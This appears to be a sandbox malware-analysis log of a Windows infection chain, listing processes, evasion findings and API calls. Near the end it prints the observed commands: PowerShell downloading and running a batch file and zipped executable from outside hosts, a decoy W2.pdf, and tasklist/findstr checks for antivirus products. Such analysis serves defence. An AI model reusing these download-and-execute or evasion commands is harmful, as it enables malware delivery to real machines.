Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4625	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1558	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2708	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2585	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5994	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7115
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2444

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	API coverage: 4.2 %
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	API coverage: 3.9 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7520	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7536	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7544	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7644	Thread sleep count: 2708 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7648	Thread sleep count: 2585 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7676	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7692	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7624	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000	Thread sleep count: 5994 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000	Thread sleep count: 65 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8152	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8540	Thread sleep count: 7115 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8540	Thread sleep count: 2444 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8568	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com TID: 2132	Thread sleep time: -45000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 16_2_004062D5 FindFirstFileW,FindClose,	16_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 16_2_00402E18 FindFirstFileW,	16_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 16_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	16_2_00406C9B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E4A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	36_2_00E4A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E4A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	36_2_00E4A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E3E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	36_2_00E3E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E4A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	36_2_00E4A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E466DC FindFirstFileW,FindNextFileW,FindClose,	36_2_00E466DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E0C622 FindFirstFileExW,	36_2_00E0C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E473D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	36_2_00E473D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E47333 FindFirstFileW,FindClose,	36_2_00E47333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E3D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	36_2_00E3D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E3DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	36_2_00E3DC54
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00A8A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00A8A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	38_2_00A7E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	38_2_00A8A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A866DC FindFirstFileW,FindNextFileW,FindClose,	38_2_00A866DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A4C622 FindFirstFileExW,	38_2_00A4C622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	38_2_00A873D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A87333 FindFirstFileW,FindClose,	38_2_00A87333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00A7D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00A7DC54

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00DD5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

36_2_00DD5FC8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: powershell.exe, 00000002.00000002.1688925304.00000000071C9000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E4F4FF BlockInput,

36_2_00E4F4FF

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00DD338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

36_2_00DD338B

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 16_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

16_2_004062FC

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF5058 mov eax, dword ptr fs:[00000030h]		36_2_00DF5058
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A35058 mov eax, dword ptr fs:[00000030h]		38_2_00A35058

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E320AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

36_2_00E320AA

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00E02992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_00E02992
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	36_2_00DF0BAF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF0D45 SetUnhandledExceptionFilter,	36_2_00DF0D45
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 36_2_00DF0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	36_2_00DF0F91
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A42992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00A42992
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A30BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00A30BAF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A30D45 SetUnhandledExceptionFilter,	38_2_00A30D45
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00A30F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_00A30F91

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

36_2_00E31B4D

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00DD338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

36_2_00DD338B

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E3BBED SendInput,keybd_event,

36_2_00E3BBED

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 36_2_00E3ECD0 mouse_event,

36_2_00E3ECD0

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://candwfarmsllc.com/c2.bat';$o=$env:TEMP + '\c2.bat';Invoke-WebRequest -Uri $u -OutFile $o;Start-Process -FilePath $o -NoNewWindow"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 361684
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Approaches
